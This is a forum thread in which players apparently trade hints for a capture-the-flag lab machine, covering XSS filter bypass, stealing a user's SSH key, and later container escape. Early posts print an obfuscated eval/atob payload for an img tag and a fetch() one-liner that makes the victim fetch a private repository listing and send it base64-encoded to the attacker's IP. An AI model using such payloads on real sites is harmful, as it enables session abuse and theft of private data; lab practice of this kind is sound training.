Posts: 44 Threads: 0 Joined: N/A

Posts: 213 Threads: 0 Joined: N/A
July 22, 2022 at 12:05 PM
(July 22, 2022, 11:36 AM)jon01 Wrote:
(July 21, 2022, 10:45 AM)Exa Wrote:
This is a payload which bypasses the filter: eval.call`${"eval\x28atob`YWxlcnQoInRlc3QiKQ==`\x29"}`
Put that payload inside an img tag.
fetch() can be used here. Try fetch("http://10.10.xxx.xxx/") and you should see an incoming request from charlie.
Now let charlie request dev.snippet.htb/api/v1/users/charlie/repos and send the response back to you using fetch().then() + btoa().
In that repository is an SSH key. (Please don't post SSH keys/passwords.)
How did you do that via JS? Seems like I am making some mistake.

fetch('http://dev.snippet.htb/api/v1/users/charlie/repos').then(response => response.text()).then(data => fetch('http://10.10.xxx.xxx/'+btoa(data)))

Posts: 9 Threads: 0 Joined: N/A
(July 22, 2022, 12:05 PM)Exa Wrote:
(July 22, 2022, 11:36 AM)jon01 Wrote:
(July 21, 2022, 10:45 AM)Exa Wrote:
This is a payload which bypasses the filter: eval.call`${"eval\x28atob`YWxlcnQoInRlc3QiKQ==`\x29"}`
Put that payload inside an img tag.
fetch() can be used here. Try fetch("http://10.10.xxx.xxx/") and you should see an incoming request from charlie.
Now let charlie request dev.snippet.htb/api/v1/users/charlie/repos and send the response back to you using fetch().then() + btoa().
In that repository is an SSH key. (Please don't post SSH keys/passwords.)
How did you do that via JS? Seems like I am making some mistake.

fetch('http://dev.snippet.htb/api/v1/users/charlie/repos').then(response => response.text()).then(data => fetch('http://10.10.xxx.xxx/'+btoa(data)))

Thanks to Exa, got user... Pffffffff what a travel to go there...

Posts: 44 Threads: 0 Joined: N/A
Any hints on root? For now I got nothing interesting. Looking at:
jean@extension:~$ la projects/
extension laravel-app
jean@extension:~$

Posts: 70 Threads: 0 Joined: N/A
(July 22, 2022, 05:46 PM)onl1_f4ns Wrote:
Any hints on root? For now I got nothing interesting. Looking at:
jean@extension:~$ la projects/
extension laravel-app
jean@extension:~$

I am also stuck on root part. I have checked stuff with linpeas, pspy64 but nothing came to my eyes or I missed them. And then I have seen that transfer.sh file is transferring laravel files to docker stuff under root. Maybe I thought there is a cron job that runs transfer.sh and updates laravel app but no. Now, I will give it another go.

Posts: 44 Threads: 0 Joined: N/A
farkow Wrote:
onl1_f4ns Wrote:
Any hints on root? For now I got nothing interesting. Looking at:
jean@extension:~$ la projects/
extension laravel-app
jean@extension:~$

I am also stuck on root part. I have checked stuff with linpeas, pspy64 but nothing came to my eyes or I missed them. And then I have seen that transfer.sh file is transferring laravel files to docker stuff under root. Maybe I thought there is a cron job that runs transfer.sh and updates laravel app but no. Now, I will give it another go.

There's a lot to check here:
jean@extension:~$ netstat -altnp
and I don't see our initial ?! Should be a docker stuff. Maybe we need to pwn laravel app and get root in the docker and then break from docker to root on the host. Enumerating.

Posts: 213 Threads: 0 Joined: N/A
July 22, 2022 at 10:19 PM
pspy shows database credentials.

Posts: 70 Threads: 0 Joined: N/A
July 22, 2022 at 10:21 PM
Woow.. I gotta check again, I already was in the database. Blind me..
----
Thanks to Exa's comment above, I have gained access to application container. (Man, thank you, you are a good teacher - giving only hints, and leave the rest to us if we really would like to enter the path)
I presume that my task is now: 1- be root and escape 2- escape
Testing these two options now.

Posts: 26 Threads: 0 Joined: N/A
(July 22, 2022, 10:21 PM)farkow Wrote:
Woow.. I gotta check again, I already was in the database. Blind me..
----
Thanks to Exa's comment above, I have gained access to application container. (Man, thank you, you are a good teacher - giving only hints, and leave the rest to us if we really would like to enter the path)
I presume that my task is now: 1- be root and escape 2- escape
Testing these two options now.

No need for step 1.

Posts: 70 Threads: 0 Joined: N/A
(July 23, 2022, 02:11 PM)loge23 Wrote:
(July 22, 2022, 10:21 PM)farkow Wrote:
Woow.. I gotta check again, I already was in the database. Blind me..
----
Thanks to Exa's comment above, I have gained access to application container. (Man, thank you, you are a good teacher - giving only hints, and leave the rest to us if we really would like to enter the path)
I presume that my task is now: 1- be root and escape 2- escape
Testing these two options now.

No need for step 1.

HEHEYY!! <3 Got it.